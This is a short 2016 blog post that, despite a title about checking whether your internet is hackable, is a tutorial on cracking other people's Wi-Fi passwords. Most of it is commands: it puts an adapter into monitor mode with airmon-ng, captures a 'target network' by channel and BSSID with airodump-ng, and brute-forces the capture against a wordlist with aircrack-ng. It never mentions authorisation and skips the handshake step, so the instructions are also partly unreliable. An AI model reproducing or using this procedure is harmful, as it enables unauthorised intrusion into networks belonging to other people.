We are legion, for we are many.

Sunday, July 10, 2016

How to know if your internet is hackable?

12:33:00 AM Posted by Unknown No comments
Cracking wifi passwords can be really tough but with the right guidance you can master it in no time. So, today I'll be teaching you how to hack wifi using kali linux.
The required accessories for this tutorial are:-


  • Kali linux.
  • A wireless adapter.
  • A very very good word list.
So after you have all these required items lets get to work.




  1. Open up you terminal and type "ifconfig"(without the quotations)
  2. If your adapter is woring fine you should see wlan0
  3. To start monitor mode type "airmon-ng start wlan0".(without the quotations)
  4. After you enter the code you will see a list of active processes, kill all these processes because they will trouble us later. kill them by typing "kill <process>" there will be two columns on the left will be numbers and on the right will be alphabets.  If on the left there is 804 and on the right there is networkmanager type "kill 804" to kill the process.
  5. To show the list of available WiFi network types, type in "airodump-ng wlan0mon".
  6. Start capturing the packets of your target network
    type the following command;
  7. airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon i.e:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon 
  8. Stop the capturing using ctrl+c and type "ls" that would bring up all the current directories and files. Select the one with ".cap" extension and type the following command:\
  9. aircrack-ng -w <full location of word list> <name of the file>
Wait till it searches the wordlist for the passcode, if the passcode is present within the wordlist the output will give you the password or it will keep on searching.
Thank you guys for visiting and have a wonderful day ahead. And please do follow me on instagram and snapchat. 

0 comments:

Post a Comment